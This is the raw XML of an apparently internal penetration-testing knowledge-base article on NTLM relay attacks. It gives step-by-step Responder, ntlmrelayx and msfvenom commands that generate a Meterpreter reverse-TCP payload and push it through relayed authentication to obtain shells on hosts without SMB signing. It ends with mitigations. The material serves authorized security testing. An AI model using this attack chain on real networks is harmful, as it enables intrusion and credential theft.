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BC278" w14:textId="326A1B47" w:rsidR="000D1D0B" w:rsidRDefault="0081575B" w:rsidP="00B94CB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NTLM Relay attacks v2: Gaining Instant Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56606A08" w14:textId="77777777" w:rsidR="00E142D0" w:rsidRDefault="00E142D0" w:rsidP="00E142D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FFA8C88" w14:textId="77777777" w:rsidR="00E142D0" w:rsidRPr="0069514E" w:rsidRDefault="00E142D0" w:rsidP="00E142D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069514E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>How does it work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EE19B8" w14:textId="7C87117F" w:rsidR="00E142D0" w:rsidRDefault="00E142D0" w:rsidP="00E142D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004164AC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When broadcast traffic such as LLMNR/NB</w:t>
      </w:r>
      <w:r w:rsidR="00D46FB6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="004164AC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">-NS/WPAD is active on an internal network, it is possible to take hashes captured by responder and relay them directly to </w:t>
      </w:r>
      <w:r w:rsidR="00E17D26">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>other machines</w:t>
      </w:r>
      <w:r w:rsidR="002C36AE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">; it’s sort of a combination of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002C36AE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>MitM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C36AE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and pass-the-hash.</w:t>
      </w:r>
      <w:r w:rsidR="004164AC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> The end result is potentially authenticated access without eve</w:t>
      </w:r>
      <w:r w:rsidR="0069514E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="001C2830">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> having to crack any passwords.</w:t>
      </w:r>
      <w:r w:rsidR="002C36AE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C2830">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C36AE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>This document covers using NTLM relay in order to gain a shell; it requires a little more setup than version 1 which just dumps local SAM hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010AE83F" w14:textId="1ED292D5" w:rsidR="001C2830" w:rsidRDefault="001C2830" w:rsidP="00E142D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7F67C5" w14:textId="00766B76" w:rsidR="004B7AB5" w:rsidRDefault="004B7AB5" w:rsidP="00E142D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069514E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidR="0069514E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> this attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> requires SMB signing to be disabled on the target of the relay.</w:t>
      </w:r>
      <w:r w:rsidR="002C36AE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> This </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002C36AE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E5D794B" w14:textId="40F78FDE" w:rsidR="00C121A8" w:rsidRPr="0069514E" w:rsidRDefault="00C121A8" w:rsidP="00E142D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069514E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>How do I use it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15996622" w14:textId="69F7D69A" w:rsidR="00CE75F6" w:rsidRDefault="00CE75F6" w:rsidP="00CE75F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE75F6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Determine whether</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> any hosts have SMB signing disabled; this can be done through Nessus, or by running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 xml:space="preserve"> –script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>-security-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>mode.nse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0069514E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C27B498" w14:textId="148480D4" w:rsidR="004B7AB5" w:rsidRPr="00CE75F6" w:rsidRDefault="004B7AB5" w:rsidP="00CE75F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Save the IPs of targets with signing disabled to a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5302F6BB" w14:textId="62627BED" w:rsidR="00E142D0" w:rsidRPr="004B7AB5" w:rsidRDefault="00E17D26" w:rsidP="00C121A8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Configure </w:t>
      </w:r>
      <w:r w:rsidR="004B7AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Responder not to listen to SMB and HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> by editing 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/share/responder/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Responder.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233DD818" w14:textId="4FCF7320" w:rsidR="00E17D26" w:rsidRDefault="00E17D26" w:rsidP="00E17D2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Install the latest version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEF6001" w14:textId="53A96E93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pip install ldap3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>dnspython</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C2F7507" w14:textId="7DAFC852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 xml:space="preserve">pip install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ldapdomaindump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2603DFDC" w14:textId="48815FAC" w:rsidR="00E17D26" w:rsidRPr="00E17D26" w:rsidRDefault="00E17D26" w:rsidP="00E17D26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clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00B840CC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
          </w:rPr>
          <w:t>https://github.com/CoreSecurity/impacket.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7A05DA85" w14:textId="45D5EB47" w:rsidR="002C36AE" w:rsidRPr="002C36AE" w:rsidRDefault="00E17D26" w:rsidP="002C36AE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>cd (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory) &amp;&amp; python setup.py install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAFEACB" w14:textId="2324B94D" w:rsidR="002C36AE" w:rsidRDefault="002C36AE" w:rsidP="002C36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the following command to generate shellcode*: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C36AE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C36AE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> –f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C36AE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>psh-cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C36AE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> –p windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C36AE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C36AE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C36AE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C36AE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST=(your internal IP) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>=(your favorite port number)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E57525" w14:textId="209EA3ED" w:rsidR="002C36AE" w:rsidRPr="002C36AE" w:rsidRDefault="002C36AE" w:rsidP="002C36AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">*Note: the generated shellcode will be VERY long, this is expected. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBED6D6" w14:textId="2F6665BD" w:rsidR="002C36AE" w:rsidRDefault="002C36AE" w:rsidP="004B7AB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Start a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> multi handler using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> info you put into your shellcode. For multiple shells, set “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>exitOnSession</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">” to “false”, and use “run –j” to background the </w:t>
      </w:r>
      <w:r w:rsidR="0081575B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>handler on launch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D90EBD5" w14:textId="3F8D529A" w:rsidR="0081575B" w:rsidRPr="0081575B" w:rsidRDefault="0081575B" w:rsidP="0081575B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</w:rPr>
        <w:t>In another terminal/tab, run the following</w:t>
      </w:r>
      <w:r w:rsidR="00042895">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: responder</w:t>
      </w:r>
      <w:r w:rsidR="009F7F81">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> –F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> –I eth0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E459055" w14:textId="0750F1DF" w:rsidR="002C36AE" w:rsidRDefault="004B7AB5" w:rsidP="002C36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 another terminal/tab, r</w:t>
      </w:r>
      <w:r w:rsidRPr="004B7AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>un</w:t>
      </w:r>
      <w:r w:rsidR="006350E3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the following: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006350E3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ntlmrelayx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006350E3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> –of (name of save file here) –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006350E3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>tf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006350E3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="004B7AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>target file from step 2)</w:t>
      </w:r>
      <w:r w:rsidR="0081575B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> –c “(copy shellcode from step 5 between these quotes)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4E9382" w14:textId="637DCAC0" w:rsidR="00321561" w:rsidRPr="0081575B" w:rsidRDefault="00321561" w:rsidP="002C36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Shells should start showing up now. Keep an eye on the process, you may not need hundreds of shells to reach your goal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192C85EE" w14:textId="77777777" w:rsidR="0069514E" w:rsidRDefault="0069514E" w:rsidP="0069514E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BD8107F" w14:textId="77777777" w:rsidR="00321561" w:rsidRDefault="00321561" w:rsidP="0069514E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AFDD5CA" w14:textId="77777777" w:rsidR="00321561" w:rsidRDefault="00321561" w:rsidP="0069514E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2333CAC4" w14:textId="0B44795A" w:rsidR="006350E3" w:rsidRDefault="00321561" w:rsidP="00DA2524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lastRenderedPageBreak/>
        <w:t>A few</w:t>
      </w:r>
      <w:r w:rsidR="006350E3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24316303" w14:textId="49585A64" w:rsidR="00321561" w:rsidRDefault="006350E3" w:rsidP="00321561">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006350E3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00042895">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>his attack is NOT</w:t>
      </w:r>
      <w:r w:rsidRPr="006350E3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> a replacement for password cracking</w:t>
      </w:r>
      <w:r w:rsidR="00042895">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. Captured hashes will still be saved, but they’ll go to wherever you specify in step 8 WITHOUT identifying </w:t>
      </w:r>
      <w:r w:rsidR="000F7AFA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>which protocol was used to capture them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2FF149" w14:textId="15B03CAA" w:rsidR="00321561" w:rsidRPr="00321561" w:rsidRDefault="00321561" w:rsidP="00321561">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00321561">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Any command can be used after the –c flag; if Meterpreter isn’t returning shells, try a more simple/better concealed payload, </w:t>
      </w:r>
      <w:r w:rsidRPr="00321561">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>or just dump SAM files using the steps in the NTLM Relay Version 1 KB listed here:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743F0D0F" w14:textId="77777777" w:rsidR="00402786" w:rsidRDefault="00321561" w:rsidP="00321561">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00214ECD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
          </w:rPr>
          <w:t>\\clt-fs01\nio\MASS\05. Knowledge Base Articles\NTLM Relay attacks v1 R0.01.docx</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00402786">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C68C8A7" w14:textId="501646AC" w:rsidR="00402786" w:rsidRDefault="00402786" w:rsidP="00321561">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">If you don’t want to use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can use any other </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>suite such as Empire/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>DeathStar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF01B94" w14:textId="6C0FFCF4" w:rsidR="00321561" w:rsidRDefault="00321561" w:rsidP="0032156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There’s even more to learn about NTLM relaying; it’s possible in theory to use this attack against MSSQL</w:t>
      </w:r>
      <w:r w:rsidR="00D46FB6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>, LDAP, and IMAP as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B36DCF" w14:textId="006E8E8A" w:rsidR="00402786" w:rsidRPr="00321561" w:rsidRDefault="00402786" w:rsidP="0032156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You don’t HAVE to use multi handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788B9443" w14:textId="77777777" w:rsidR="00DA2524" w:rsidRPr="00DF726B" w:rsidRDefault="00DA2524" w:rsidP="00DA2524">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF726B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC3C255" w14:textId="3C67FDF9" w:rsidR="00DA2524" w:rsidRDefault="00E17D26" w:rsidP="00E17D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Mitigate LLMNR/NB</w:t>
      </w:r>
      <w:r w:rsidR="00D46FB6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>-NS/WPAD weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B43E048" w14:textId="6F20E045" w:rsidR="00E17D26" w:rsidRPr="00E17D26" w:rsidRDefault="00E17D26" w:rsidP="00E17D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Enable SMB signing on all devices that use SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A02F13F" w14:textId="77777777" w:rsidR="00DA2524" w:rsidRDefault="00C57FF0" w:rsidP="00DA252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References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F3FDBF" w14:textId="399D2395" w:rsidR="0069514E" w:rsidRDefault="00402786" w:rsidP="00DA2524">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="0069514E" w:rsidRPr="00B840CC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1BC679C7" w14:textId="46E81EF7" w:rsidR="00C57FF0" w:rsidRPr="0069514E" w:rsidRDefault="00402786" w:rsidP="00DA2524">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00DF726B" w:rsidRPr="00DF726B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>https://www.fox-it.com/en/insights/blogs/blog/inside-windows-network/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="00C57FF0" w:rsidRPr="0069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10C3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="707A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45E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94D08350"/>
    <w:lvl w:ilvl="0" w:tplc="FB8AA2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F066B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0CD6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91A3D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1430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1592D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AF12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92810"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DAF69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2B"/>
    <w:rsid w:val="00042895"/>
